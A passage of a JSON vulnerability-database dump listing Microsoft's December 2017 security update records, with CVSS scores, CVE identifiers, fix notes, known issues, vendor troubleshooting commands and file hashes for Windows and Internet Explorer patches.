"December 12, 2017\u2014KB4054523 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054523", "href": "https://support.microsoft.com/en-us/help/4054523", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:29", "description": "None\n## Summary\n\nA remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploits this vulnerability could execute code on the target system. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. \n \nTo learn more about the vulnerability, go to [CVE-2017-11885](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-11885>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4052303>) website. 
\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base: [Security update deployment information: December 12, 2017](<http://support.microsoft.com/en-us/help/20171212>)\n\n## More Information\n\n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. \n \n**Windows Server 2008 file information**\n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## File Information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4052303-x86.msu| DB04C6C78547402EA77DF8F66838EA9B8AAA47E6| 331BAFEC35448B35F4CCB640AC652719F4AF400212E171C10EEDD9238FA3F02B \nWindows6.0-KB4052303-ia64.msu| 2410CAA394F895CF6CF59AA49CA9D137014B0463| CA1B61B11A1A6F475E1EA6F18F44BF9C7F64CF8FFFF44A09A55F32277871ADEF \nWindows6.0-KB4052303-x64.msu| A7E2EEF99E0BDF69EEA850689ACD8D590F9B339F| 
D2B7C1BDD29A7B9811D1340B0E346833C6157B06E582375C0AEF113C58C62BC2 \n \n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 16,384| 02-Nov-2017| 15:22| IA-64 \nIprtrmgr.dll| 6.0.6002.24231| 583,168| 02-Nov-2017| 15:22| IA-64 \nMprdim.dll| 6.0.6002.24231| 169,984| 02-Nov-2017| 15:22| IA-64 \nRasmigplugin.dll| 7.2.6002.24231| 289,792| 02-Nov-2017| 15:22| IA-64 \nRtm.dll| 6.0.6002.24231| 317,952| 02-Nov-2017| 15:22| IA-64 \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 \n \n## For all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 9,728| 02-Nov-2017| 22:45| x64 \nIprtrmgr.dll| 6.0.6002.24231| 279,552| 02-Nov-2017| 22:45| x64 \nMprdim.dll| 6.0.6002.24231| 87,552| 02-Nov-2017| 22:46| x64 \nRtm.dll| 6.0.6002.24231| 137,728| 02-Nov-2017| 22:46| x64 \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 
\nRasmigplugin.dll| 7.2.6002.24231| 153,600| 02-Nov-2017| 22:46| x64 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Description of the security update for the Windows RRAS Service remote code execution vulnerability in Windows Server 2008: December 12, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4052303", "href": "https://support.microsoft.com/en-us/help/4052303", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:37", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. 
Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\n\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054522>) website.\n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 4054522](<http://download.microsoft.com/download/1/A/B/1AB87DD9-C3CC-4807-AA42-01CFC6411DAB/4054522.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054522 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054522", "href": "https://support.microsoft.com/en-us/help/4054522", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:36:51", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Addresses issue where, after you install KB4041688, KB4052231, or KB4048953, the error \"CDPUserSvc_XXXX has stopped working\" appears. Additionally, this resolves the logging of Event ID 1000 in the Application event log. It notes that svchost.exe_CDPUserSvc_XXXX stopped working and the faulting module name is \"cdp.dll\".\n * Security updates to the Microsoft Scripting Engine and Microsoft Edge.\n**Note: **This update isn't available with express installation files for Windows Server 2016.If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only affect devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nAfter installing this update, servers where Credential Guard is enabled may experience an unexpected restart with the error, \"The system process lsass.exe terminated unexpectedly with status code -1073740791. 
The system will now shut down and restart.\" Event ID 1000 in the application log shows: \"C:\\windows\\system32\\lsass.exe' terminated unexpectedly with status code -1073740791 Faulting application: lsass.exe, Version: 10.0.14393.1770, Time Stamp: 0x59bf2fb2 Faulting module: ntdll.dll, Version: 10.0.14393.1715, Time Stamp: 0x59b0d03e Exception: 0xc0000409| This issue is resolved in KB4077525. \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053579>) website.\n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 4053579](<http://download.microsoft.com/download/B/C/0/BC0B73A3-6094-473B-AF66-143757D547D7/4053579.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053579 (OS Build 14393.1944)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], 
"modified": "2017-12-12T08:00:00", "id": "KB4053579", "href": "https://support.microsoft.com/en-us/help/4053579", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:36:53", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Addresses issue that affected some Epson SIDM (Dot Matrix) and TM (POS) printers, which were failing to print on x86-based and x64-based systems. This issue affects KB4048956.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only be offered to devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. 
To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053581>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053581](<http://download.microsoft.com/download/F/E/1/FE1FD527-89EC-472A-AC5F-185293C8FB1E/4053581.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053581 (OS Build 10240.17709)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053581", "href": "https://support.microsoft.com/en-us/help/4053581", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:03", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4050946 (released November 27, 2017) and addresses the following issues:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to 
use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054519>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054519](<http://download.microsoft.com/download/0/D/1/0D1E3A78-BE95-4502-8BA4-88663CF9197E/4054519.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054519 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054519", "href": "https://support.microsoft.com/en-us/help/4054519", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:29", "description": "None\n_This update can be applied to Windows 10 Enterprise and Windows 10 Education editions only. _\n\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Addresses issue that affected some Epson SIDM (Dot Matrix) and TM (POS) printers, which were failing to print on x86-based and x64-based systems. This issue affects KB4048952.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only be offered to devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. 
To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053578>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053578](<http://download.microsoft.com/download/0/F/7/0F772332-4655-4A81-9D65-9D49318AC7FA/4053578.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053578 (OS Build 10586.1295)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053578", "href": "https://support.microsoft.com/en-us/help/4053578", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-10T10:20:57", "description": "None\n## Summary\n\nThis security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. 
To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-US/security-guidance/>). Additionally, see the following articles for more information about this cumulative update:\n\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/en-us/help/4009469/windows-7-sp1-windows-server-2008-r2-sp1-update-history>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/en-us/help/4009471/windows-server-2012-update-history>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/en-us/help/4009470/windows-8-1-windows-server-2012-r2-update-history>)\n * [Windows 10 and Windows Server 2016 update history](<https://support.microsoft.com/en-us/help/4000825/windows-10-and-windows-server-2016-update-history>)\n**Important**\n\n * The fixes that are included in this Security Update for Internet Explorer 4052978 are also included in the December 2017 Security Monthly Quality Rollup. Installing either the Security Update for Internet Explorer or the Security Monthly Quality Rollup installs the fixes that are in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this Security Update for Internet Explorer 4052978, the December 2017 Security Only Quality Update, and the December 2017 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * This Security Update for Internet Explorer is not applicable for installation on a computer where the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from December 2017 (or a later month) is already installed. 
This is because those updates contain all fixes that are in this Security Update for Internet Explorer.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base: Security update deployment information: December 12, 2017\n\n## How to get and install the update \n\n### Method 1: Microsoft Update\n\nThis update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<http://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n**Note** For Windows RT and Windows RT 8.1, this update is available through Microsoft Update only.\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4052978>) website.\n\n## More Information\n\n### How to get help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n\n**File information**\n\nFor a list of the files that are provided in this 
cumulative update, download the [file information for cumulative update KB 4052978](<http://download.microsoft.com/download/C/F/7/CF7CCEC7-43BD-4D1F-A1B4-8144F6A6D35F/4052978.csv>).\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows8.1-KB4052978-x86.msu| DFFD7ADD5FF57CE58D4D3FA250999D0C76DDB059| 5360A01857C1C94962A35C12249C62B20FD2070D9303E31773DFD1704640C94D \nWindows8.1-KB4052978-x64.msu| 95978DBA754B4097031F369A23BF1C17BD81F7D7| 70C7DAEB39EEDB0F8E1B03851FCE66B36B68AE13DDDB1CC56D8202E84CD3D36C \nWindows8-RT-KB4052978-x64.msu| FC28568EBA01C2FA019469393091A2DEDC9FE262| 1AA6D2D922002CCE357942B7003FD364DF09E118F1A783A303207EF6BE54B7AA \nIE11-Windows6.1-KB4052978-X64.msu| EFA1E0C54BCEBD5117891D8E82104CEE742444C2| 9F289E216653A82485D90667DF8E1FA209C497775D063A0B305B3440883680C9 \nIE11-Windows6.1-KB4052978-X86.msu| 92C867719463186F23E992EBF1AD6442DF3DD949| 3455AB15B8CEC9AFDA1AE382248E438B3A0D403D5D81476914D430C90EC3FF45 \nIE9-Windows6.0-KB4052978-X86.msu| E6B5ED0888DA1070EE47067D30DFE9C0F08EF9F1| 2D210B855AB5DA7B6282EDA0B025FC0CDE8BC9ED77F460DB91F43ED99DD53877 \nIE9-Windows6.0-KB4052978-X64.msu| 8135281F95B2A577506830C2B17CA65B86600A74| 5E4475E4C8CBF88F8C9F0E570D3D7ECCDC02158FF274AC4C2A191732FDA85FAF\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Cumulative security update for Internet Explorer: December 12, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4052978", "href": "https://support.microsoft.com/en-us/help/4052978", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:35", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updates Internet Explorer\u2019s default visibility for the button that launches Microsoft Edge.\n * Addresses issue where Windows Defender Device Guard and Application Control block some applications from running, even in Audit-Only Enforcement Mode.\n * Addresses issue to reset PLC bit on U0/U3 transitions.\n * Addresses issue with personalized Bluetooth devices that don't support bonding.\n * Addresses issue where the touch keyboard doesn\u2019t support the standard layout for 88 languages.\n * Addresses issue where the touch keyboard for a third-party Input Method Editor (IME) has no IME ON/OFF key.\n * Addresses additional issues with updated time zone information.\n * Addresses issue where, when using System Center Virtual Machine Manager (VMM), the user can't copy or clone virtual machines (VM). The error message is \"0x80070057- Invalid parameter\". This issue affects the VMM UI and PowerShell scripts used for VM cloning and copying.\n * Addresses issue where the Internet Connection Sharing (ICS) service does not persist connections across OS reboots or ICS service restarts. 
The solution can be activated through an optional \u201cEnableRebootPersistConnection\u201d registry key described in KB4055559.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\n\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nUpdate installation may stop at 99% and may show elevated CPU or disk utilization if a device was reset using the **Reset this PC** functionality after installing KB4054022.| This issue is resolved in KB4058702. **Note** If you are impacted by this issue, you must restart your PC or end the existing Trusted Installer processes by running the following from an Administrative command prompt: `taskkill /f /im tiworker.exe` and `taskkill /f /im trustedinstaller.exe`. Devices that were impacted by this issue may have large CBS.log files. These files can be deleted by running the following from an Administrative command prompt: `del /f %windir%\\logs\\cbs\\*.log` \nWindows Update History reports that KB4054517 failed to install because of Error 0x80070643.| This issue is resolved in KB4058258. \nAfter installing this update, some preinstalled apps running Windows 10 version 1709 may be deleted at system restart.| This issue is resolved in KB4056892. Uninstalled apps can be reinstalled manually from the Microsoft Store. \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. 
To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054517>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4054517](<http://download.microsoft.com/download/2/A/8/2A8F695C-424C-4E7D-8A04-D5952A77753B/4054517.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054517 (OS Build 16299.125)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, 